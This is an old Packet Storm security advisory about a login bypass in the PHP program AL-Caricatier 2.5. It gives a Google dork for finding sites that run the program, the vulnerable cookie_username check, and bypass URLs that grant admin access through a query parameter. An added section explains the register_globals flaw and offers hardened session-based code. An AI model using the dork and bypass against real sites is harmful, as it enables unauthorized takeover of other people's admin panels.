AL-Caricatier.txt

2005-10-26T00:00:00
ID PACKETSTORM:40964
Type packetstorm
Reporter MoHaJaLi
Modified 2005-10-26T00:00:00

Description

`Vulnerability in AL-Caricatier, V.2.5

Hello...
I found a vulnerability in a program called AL-Caricatier; it's an Arabic program.
  
site:  
http://www.php-ar.com  
  
Vulnerability:  
Login Bypass  
  
GoogleDork:  
inurl:view_caricatier. php  
  
Vulnerability in an included file called ss.php, which resides in the admin directory...
  
// $cookie_username is never assigned in this file. It is meant to come from a
// cookie set at login, but with register_globals enabled PHP also creates it from
// any request parameter of the same name, so the check can be satisfied without
// logging in.
if($cookie_username){
    echo "";
}else{
    // Arabic text restored from its mis-encoded form; it reads "You did not log in"
    echo "<font face='tahoma' size='2'>You Didn't Sign in لم تقم بتسجيل الدخول</font>";
    echo "<meta http-equiv='Refresh' content='1; url=admin_login.php'>";
    exit;
}
  
The admin directory is protected by a username and password, but you can bypass them by going to this link:

www.victim.com/view_caricatier.php

To bypass:
www.victim.com/admin/welcome.php?cookie_username=admin
or any of the admin files instead of welcome.php, like:
add-flashFile.php
caricatier_add.php
delete_cat.php

and you are in the admin interface...
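A hardened form of the check, added here as an example; it is not code from the advisory or from AL-Caricatier itself. The function name require_admin_login, the session key admin_username and the login page name are assumptions. The point it shows is that the admin identity must come from server-side session state, never from a bare variable that the request can populate:

```php
<?php
// Added example (not part of the original advisory or of AL-Caricatier's code):
// a hardened replacement for the admin check in ss.php. Function, session key and
// file names are assumptions for illustration.
//
// The original check tests a bare variable, $cookie_username, that the file never
// assigns. With register_globals enabled, PHP creates such a variable from any
// request parameter of the same name, so a crafted query string passes the test.
// The fix is to authenticate from server-side session state only.

// Refuse to run at all if the legacy setting is on; this removes the whole class
// of "undefined variable filled in by the request" bugs, not just this one.
// On PHP >= 5.4 the setting no longer exists and ini_get() returns false.
if (filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN)) {
    http_response_code(500);
    exit('register_globals must be disabled');
}

// Returns the logged-in admin's username, or redirects to the login page and exits.
function require_admin_login(string $login_page = 'admin_login.php'): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        // The session id travels in an HttpOnly cookie; nothing about identity is
        // read from the query string or from client-chosen cookie values.
        session_set_cookie_params(['httponly' => true, 'samesite' => 'Lax']);
        session_start();
    }

    // Fail closed: only a value that admin_login.php stored after verifying the
    // password counts. Read from $_SESSION, never from $_GET, $_POST or $_COOKIE.
    $user = $_SESSION['admin_username'] ?? null;
    if (!is_string($user) || $user === '') {
        header('Location: ' . $login_page, true, 302);
        exit;
    }
    return $user;
}

// Usage at the top of every admin page (welcome.php, caricatier_add.php, ...):
$admin = require_admin_login();
echo '<p>Signed in as ' . htmlspecialchars($admin, ENT_QUOTES, 'UTF-8') . '</p>';
```

The login page that pairs with this check should call session_regenerate_id(true) after the password is verified and only then store the username in $_SESSION, so that a session fixed before login carries no admin identity.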
  
  
  
  
--  
(r).....Now I Am Become Death....The Destroyer Of Worlds.....The Creator oF
Geniuses....(c)
`